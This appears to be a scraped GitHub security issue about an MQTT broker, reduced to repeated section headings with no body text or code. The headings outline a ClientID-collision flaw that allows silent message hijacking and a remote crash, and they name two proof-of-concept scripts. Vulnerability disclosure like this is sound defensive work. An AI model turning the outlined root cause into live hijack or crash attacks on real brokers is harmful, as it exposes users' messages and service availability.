5. No session-level lock; the shared session is mutated concurrently.

6. The inflight-retry cron is the path that hits both colliding connections.

Specification context

Impact

Proof of Concept

Build & run

PoC 1 — silent subscription/message hijack (`mqtt004_hijack.py`)

PoC 2 — remote crash via shared-session refcount race (`mqtt004_cron_race.py`)

Suggested remediation

References

Appendix A — ASan/UBSan stack trace (verbatim)

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

ClientID-collision silent subscription/message hijack and shared-session remote crash #17

Description

Executive Summary

Metadata

Affected versions & configuration

Technical overview

Root cause analysis

1. The "kick out" comment is dead code; no existing connection is ever closed.

2. Duplicate ClientID keys coexist in clients_map.

3. The colliding CONNECT reuses the victim's session by pointer.

4. Routing uses first-match bucket lookup → newest connection wins.

5. No session-level lock; the shared session is mutated concurrently.

6. The inflight-retry cron is the path that hits both colliding connections.

Specification context

Impact

Proof of Concept

Build & run

PoC 1 — silent subscription/message hijack (mqtt004_hijack.py)

PoC 2 — remote crash via shared-session refcount race (mqtt004_cron_race.py)

Suggested remediation

References

Appendix A — ASan/UBSan stack trace (verbatim)

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions

2. Duplicate ClientID keys coexist in `clients_map`.

PoC 1 — silent subscription/message hijack (`mqtt004_hijack.py`)

PoC 2 — remote crash via shared-session refcount race (`mqtt004_cron_race.py`)